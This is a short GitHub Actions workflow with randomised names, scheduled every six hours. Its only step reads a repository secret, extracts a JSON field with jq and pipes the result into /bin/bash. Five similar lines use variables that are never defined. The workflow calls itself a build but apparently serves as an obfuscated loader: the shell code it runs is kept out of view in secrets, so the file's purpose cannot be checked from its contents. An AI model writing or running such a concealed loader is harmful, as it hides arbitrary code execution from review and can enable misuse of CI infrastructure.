name: tanloujun7165
on:
  workflow_dispatch:
  schedule:
    - cron: '55 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tanloujun7165
        env:
          agu0869: ${{ secrets.agu0869 }}
        run: |
          echo $agu0869 | jq -r .p28566 | /bin/bash
          echo $k539 | jq -r .pdj6271 | /bin/bash
          echo $y17 | jq -r .oiab0 | /bin/bash
          echo $bbt996 | jq -r .ux0897 | /bin/bash
          echo $rgew7626 | jq -r .k8624 | /bin/bash
          echo $kqh9 | jq -r .xng6748 | /bin/bash

